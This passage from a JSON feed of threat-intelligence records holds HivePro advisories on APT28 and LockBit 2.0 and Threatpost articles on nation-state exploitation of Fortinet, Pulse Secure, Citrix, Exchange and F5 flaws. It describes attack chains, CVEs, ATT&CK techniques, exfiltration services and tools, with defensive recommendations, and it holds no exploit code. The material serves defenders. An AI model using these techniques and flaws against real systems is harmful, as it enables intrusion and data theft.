Threat actors gain initial access by using brute force to identify valid account credentials for domain and M365 accounts. Using compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources such as SharePoint pages user-profiles and user emails. They further used harvested credentials in conjunction with known vulnerabilities CVE-2020-0688 &amp; CVE-2020-17144 in the Microsoft exchange server to escalate privileges and gain remote code execution (RCE) on the exposed applications. In addition, they have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. After gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrated credentials and export copies of the AD database &quot;ntds.dit&quot;. In multiple breaches, they maintained persistence for at least 6 months in the network continuously exfiltrating sensitive emails and data. Organizations can mitigate the risk by following the recommendations: \u2022Monitor the use of stolen credentials. \u2022Keep all operating systems and software up to date. \u2022Enable multifactor authentication (MFA) for all users, without exception. \u2022 The Techniques commonly used by Russian cyber actor, APT28 are: TA0043: Reconnaissance TA0001: Initial Access TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0009: Collection TA0003: Persistence TA0008: Lateral Movement TA0011: Command and Control T1027: Obfuscated Files or Information T1133: External Remote Services T1190: Exploit Public-Facing Application T1083: File and Directory Discovery T1482: Domain Trust Discovery T1213.002: Data from Information Repositories: SharePoint T1090.003: Proxy: Multi-hop Proxy T1589.001: Gather Victim Identity Information: Credentials T1003.003: OS Credential Dumping: NTDS T1110.003: Brute Force: Password Spraying T1566.002: Phishing: Spearphishing Link T1078.002: Valid Accounts: Domain Accounts T1078.004: Valid Accounts: Cloud Accounts Actor Details Vulnerability Details References https://www.cisa.gov/uscert/ncas/alerts/aa22-047a", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-18T12:20:35", "type": "hivepro", "title": "Russian state-sponsored cyber actors targeting U.S. critical infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-18T12:20:35", "id": "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8", "href": "https://www.hivepro.com/russian-state-sponsored-cyber-actors-targeting-u-s-critical-infrastructure/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T12:02:03", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Since September 2021, LockBit 2.0 has targeted 500+ organizations in vital areas globally. The most recent attack targeted well-known tire producer Bridgestone, software behemoth Accenture, and the French Ministry of Justice. LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero-day exploit. Some of the know vulnerabilities exploited are CVE-2021-22986 affecting BIG-IP products and CVE-2018-13379 impacting FortiOS. The ransomware first assesses the system and user language settings and only targets those that do not match a predefined list of Eastern European languages. It then erases system logs and shadow copies on disk as soon as the infection begins. In addition to this, it also collects system data such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. Furthermore, it tries to encrypt all data stored to any local or remote device, but it ignores files linked with critical system operations. After the encryption, the ransomware deletes itself from the disk and creates persistence upon startup. Lockbit 2.0 affiliates typically employ the Stealbit program received straight from the Lockbit panel to exfiltrate certain file types prior to encryption. The affiliate can adjust the desired file types to adapt the attack to the target. Additionally, they frequently employ publicly accessible file-sharing platforms such as privatlab.net, anonfiles.com, sendspace.com, fex.net, transfer.sh, and send.exploit.in. While some of these programs and services may serve legitimate reasons, others may be exploited by threat actors. The Organizations can mitigate the risk by following the recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The Mitre TTPs commonly used by LockBit 2.0 are: TA0040 - ImpactTA0042 - Resource Development TA0001 - Initial Access TA0002 - Execution TA0003 - Persistence TA0005 - Defense Evasion TA0006 - Credential Access TA0007 - Discovery TA0008 - Lateral Movement TA0009 - Collection TA0011 - Command and ControlTA0010 - ExfiltrationT1190: Exploit Public-Facing ApplicationT1047: Windows Management InstrumentationT1059: Command and Scripting InterpreterT1059.003: Windows Command ShellT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderT1055: Process InjectionT1070.004: Indicator Removal on Host: File DeletionT1112: Modify RegistryT1497: Virtualization/Sandbox EvasionT1110: Brute ForceT1056.004: Credential API HookingT1012: Query RegistryT1018: Remote System DiscoveryT1057: Process DiscoveryT1021: Remote ServicesT1021.001: Remote Services: Remote Desktop ProtocolT1021.002: Remote Services: SMB/Windows Admin SharesT1056.004: Credential API HookingT1090.003: Proxy: Multi-hop ProxyT1567.002: Exfiltration Over Web Service: Exfiltration to Cloud StorageT1486: Data Encrypted for ImpactT1490: Inhibit System Recovery Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches bridgestoneamericas.com accenture.com justice.fr Patch Link https://www.fortiguard.com/psirt/FG-IR-18-384 https://support.f5.com/csp/article/K03009991 References https://www.ic3.gov/Media/News/2022/220204.pdf https://threatpost.com/accenture-lockbit-ransomware-attack/168594/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-15T10:07:18", "type": "hivepro", "title": "LockBit 2.0 Ransomware affiliates targeting Renowned Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-22986"], "modified": "2022-03-15T10:07:18", "id": "HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "href": "https://www.hivepro.com/lockbit-2-0-ransomware-affiliates-targeting-renowned-organizations/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence &amp; Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": 